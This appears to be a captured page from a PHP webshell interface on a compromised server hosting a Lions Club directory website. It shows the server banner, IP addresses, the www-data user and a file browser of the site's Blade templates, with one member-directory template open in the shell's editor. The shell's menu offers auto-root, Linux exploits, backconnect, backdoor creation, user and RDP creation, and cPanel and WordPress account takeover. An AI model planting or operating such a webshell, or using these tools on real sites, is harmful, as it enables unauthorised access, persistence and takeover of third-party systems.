Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.137.181.171
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
lionsclub /
core /
resources /
views /
frontEnd /
[ HOME SHELL ]
Name
Size
Permission
Action
home
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
abode.blade.php
7.59
KB
-rwxr-xr-x
contact.blade.php
22.5
KB
-rw-r--r--
districtdirectory.blade.php
13.33
KB
-rwxr-xr-x
exe_officer_isame.blade.php
5.2
KB
-rw-r--r--
gat.blade.php
7.75
KB
-rwxr-xr-x
home.blade.php
36.94
KB
-rw-r--r--
indiadirectory.blade.php
7.91
KB
-rwxr-xr-x
indiaid.blade.php
7.55
KB
-rwxr-xr-x
indialeaders.blade.php
3.2
KB
-rwxr-xr-x
indiapid.blade.php
7.58
KB
-rwxr-xr-x
internationaldirectory.blade.p...
8.6
KB
-rwxr-xr-x
isame.blade.php
7.58
KB
-rwxr-xr-x
isamecontact.blade.php
5.61
KB
-rwxr-xr-x
layout.blade.php
2.58
KB
-rw-r--r--
lci.blade.php
5.2
KB
-rwxr-xr-x
lcif.blade.php
7.79
KB
-rwxr-xr-x
lionspages.blade.php
512
B
-rw-r--r--
member.blade.php
14.93
KB
-rwxr-xr-x
showAllCouncilCP.blade.php
3.49
KB
-rwxr-xr-x
showAlldisctrictgov.blade.php
3.99
KB
-rwxr-xr-x
showAllfirstdistrictgov.blade....
3.91
KB
-rwxr-xr-x
showAllseconddistrictgov.blade...
4.03
KB
-rwxr-xr-x
sitemap.blade.php
365
B
-rw-r--r--
subdistrict.blade.php
5.92
KB
-rwxr-xr-x
table.blade.php
22.77
KB
-rw-r--r--
topic.blade.php
66.05
KB
-rw-r--r--
topics.blade.php
40.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : abode.blade.php
@extends('frontEnd.layout') @section('content') <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css"> <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script> <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.bundle.min.js"></script> <link href="{{ URL::asset('assets/frontend/css/style_new.css') }}" rel="stylesheet"/> <div class="container mt-5"> <div class="row dictCode"> <div class="col-lg-12 col-md-12 searchText"> <div class="searchBar"> <img src="{{ url('uploads/images/search.png') }}"> <input type="text" class="lionsearchBox" placeholder="Search by Name or District Code"> <button>Search</button> </div> </div> </div> </div> <div class="container mt-4"> <div class="row imgColors1"> <div class="col-lg-8 teams"> </div> <div class="col-lg-4 exportBtn"> <button onclick="window.location.href='/indiadirectory';">India Directory</button> <button onclick="window.location.href='/directory';">Leadership Team</button> <!-- <button onclick="history.back();"> Previous Page</button> --> </div> <div class="col-lg-9 teams"> <p> PAST INTERNATIONAL PRESIDENTS-HEAVENLY ABODE</p> </div> <div class="col-md-12 col-sm-12 accordionMenu"> @php $positions = [ 'Past International Presidents-Heavenly Abode' => $Past_International_Presidents_Heavenly_Abode, ]; @endphp @foreach ($positions as $position => $members) <div class="card mb-4"> <!-- <div class="card-header"> <h5 class="card-title">{{ $position }}</h5> </div> --> <div class="card-body"> <div class="row"> @if (empty($members)) <div class="col-lg-12 mt-4"> <p>No {{ $position }} found for this year.</p> </div> @else @foreach ($members as $member) <div class="col-lg-6 col-sm-12 govrnProfile"> <div class="row"> <div class="col-lg-2 col-sm-2"> <img class="govprofileImage" src="{{ url('uploads/members/'.$member['photo']) }}" alt="Profile Image" onerror="this.onerror=null; this.src='{{ asset('uploads/members/Portrait_Placeholder.png') }}'"> </div> <div class="col-lg-7 col-sm-7"> <a href="{{ url('member/'.$member['id']) }}"><h5 class="text-wrap">{{ $member['full_name'] }}</h5></a> <p>{{ $member['category'] }}</p> <?php if ($member['start_date'] != null) { $startdate = $member['start_date']; $startdateTime = DateTime::createFromFormat('d/m/Y', $startdate); // Check if $dateTime is a DateTime object if ($startdateTime !== false) { $startyear = $startdateTime->format('Y'); } else { // Handle the case where the date format is incorrect $startyear = ""; } } else { $startyear = ""; } if ($member['end_date'] != null) { $enddate = $member['end_date']; $enddateTime = DateTime::createFromFormat('d/m/Y', $enddate); // Check if $dateTime is a DateTime object if ($enddateTime !== false) { $endyear = $enddateTime->format('Y'); } else { // Handle the case where the date format is incorrect $endyear = ""; } } else { $endyear = ""; } ?> <h6>Period: {{$startyear}} - {{$endyear}} </h6> <!-- <h6>Year: 2024 -2025</h6> --> @if(!empty($member['email_id'])) <a href="mailto:{{ $member['email_id'] }}"> <img src="{{ url('uploads/images/mail.png') }}" style="padding-right: 5px;"> {{ $member['email_id'] }} </a> @endif @if(!empty($member['mobile_numbers'])) <a href="#"><img src="{{ url('uploads/images/mobile.png') }}" style="padding-right: 5px;"> {{ $member['mobile_numbers'] }}</a> @endif </div> <div class="col-lg-3 col-sm-3"> <h3 class="text-right"><span>MD-{{ $member['district'] }}</span></h3> </div> @if(!empty($member['full_address'])) <div class="col-lg-12 locImg"> <img src="{{ url('uploads/images/location.png') }}" alt="Location Icon"> <h2>{{ $member['full_address'] }}</h2> </div> @endif </div> </div> @endforeach @endif </div> </div> </div> @endforeach </div> </div> </div> @endsection
Close